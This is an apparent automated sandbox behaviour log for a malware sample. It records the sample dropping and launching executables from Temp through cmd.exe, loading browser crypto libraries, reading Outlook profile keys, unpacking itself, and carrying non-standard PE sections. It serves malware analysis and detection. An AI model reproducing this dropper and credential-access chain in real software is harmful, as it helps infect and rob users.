Source: C:\Users\user\Desktop\Zachv5lCuu.exe File read: C:\Users\user\Desktop\Zachv5lCuu.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Zachv5lCuu.exe "C:\Users\user\Desktop\Zachv5lCuu.exe"
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HIDAAKEGDB.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe "C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe"
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user~1\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user~1\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe "C:\Users\user~1\AppData\Local\Temp\1000006001\25bb638aac.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user~1\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe" Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HIDAAKEGDB.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe "C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user~1\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe "C:\Users\user~1\AppData\Local\Temp\1000006001\25bb638aac.exe" Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: duser.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.ui.immersive.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47mrm.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uianimation.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: Zachv5lCuu.exe Static file information: File size 2452992 > 1048576
Source: Zachv5lCuu.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x213a00
Source: Binary string: mozglue.pdbP source: Zachv5lCuu.exe, 00000000.00000002.1540779259.000000006CD1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: Zachv5lCuu.exe, 00000000.00000002.1547785998.000000006CEDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: Zachv5lCuu.exe, 00000000.00000002.1547785998.000000006CEDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: Zachv5lCuu.exe, 00000000.00000002.1540779259.000000006CD1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Unpacked PE file: 0.2.Zachv5lCuu.exe.cd0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Unpacked PE file: 9.2.GHCGDAFCFH.exe.670000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vtxlewez:EW;ehvxcztv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vtxlewez:EW;ehvxcztv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 11.2.explorti.exe.bf0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vtxlewez:EW;ehvxcztv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vtxlewez:EW;ehvxcztv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 12.2.explorti.exe.bf0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vtxlewez:EW;ehvxcztv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vtxlewez:EW;ehvxcztv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Unpacked PE file: 13.2.25bb638aac.exe.e40000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 17.2.explorti.exe.bf0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vtxlewez:EW;ehvxcztv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vtxlewez:EW;ehvxcztv:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCA3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 0_2_6CCA3480
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .data
PE file contains an invalid checksum
Source: random[1].exe.11.dr Static PE information: real checksum: 0x0 should be: 0x25807a
Source: GHCGDAFCFH.exe.0.dr Static PE information: real checksum: 0x1deb8b should be: 0x1d793e
Source: Zachv5lCuu.exe Static PE information: real checksum: 0x0 should be: 0x25807a
Source: explorti.exe.9.dr Static PE information: real checksum: 0x1deb8b should be: 0x1d793e
Source: amadka[1].exe.0.dr Static PE information: real checksum: 0x1deb8b should be: 0x1d793e
Source: 25bb638aac.exe.11.dr Static PE information: real checksum: 0x0 should be: 0x25807a
PE file contains sections with non-standard names
Source: Zachv5lCuu.exe Static PE information: section name:
Source: Zachv5lCuu.exe Static PE information: section name:
Source: Zachv5lCuu.exe Static PE information: section name:
Source: Zachv5lCuu.exe Static PE information: section name:
Source: Zachv5lCuu.exe Static PE information: section name:
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: GHCGDAFCFH.exe.0.dr Static PE information: section name:
Source: GHCGDAFCFH.exe.0.dr Static PE information: section name: .idata
Source: GHCGDAFCFH.exe.0.dr Static PE information: section name:
Source: GHCGDAFCFH.exe.0.dr Static PE information: section name: vtxlewez
Source: GHCGDAFCFH.exe.0.dr Static PE information: section name: ehvxcztv
Source: GHCGDAFCFH.exe.0.dr Static PE information: section name: .taggant
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: vtxlewez
Source: amadka[1].exe.0.dr Static PE information: section name: ehvxcztv
Source: amadka[1].exe.0.dr Static PE information: section name: .taggant
Source: explorti.exe.9.dr Static PE information: section name:
Source: explorti.exe.9.dr Static PE information: section name: .idata
Source: explorti.exe.9.dr Static PE information: section name:
Source: explorti.exe.9.dr Static PE information: section name: vtxlewez
Source: explorti.exe.9.dr Static PE information: section name: ehvxcztv
Source: explorti.exe.9.dr Static PE information: section name: .taggant
Source: random[1].exe.11.dr Static PE information: section name:
